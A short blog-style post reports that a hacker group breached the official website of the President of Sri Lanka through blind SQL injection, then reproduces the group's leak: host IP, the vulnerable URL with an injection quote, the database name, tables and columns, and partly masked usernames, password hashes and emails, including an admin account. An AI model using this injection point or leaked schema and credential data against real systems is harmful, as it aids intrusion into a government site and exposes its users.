Hackers Group called "Broken-Security" have breached the official website of the President of Sri Lanka.
Blind SQL Injection was used for the site. They have posted the vulnerability on pastebin.
-->
Blind SQL Injection was used for the site. They have posted the vulnerability on pastebin.
**************************
< Owned BY Broken-Security >
**************************
###########################
# Host IP: 184.173.17.142 #
# Web Server: Apache #
# DB Server: MySQL >=5 #
###########################
Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233'
*Current DB: presiden_db
*Tables Name: Columns
writings
users -------> timestamp email userlevel userid password username
speeches
pre_users -------> userLevel password userName userID
pre_news
pre_events
photogallery
photoalbumtitle
photoalbum
inter
homeimage
banned_users
active_users
active_guests
*Data:
username password email userlevel
useronly b420243########b8a1098ee######## ######@######.com 1
admin 8a8644########################## ########@######.com 9
userName password UserLevel
####### ###### 1
--> -->
0 comments:
Post a Comment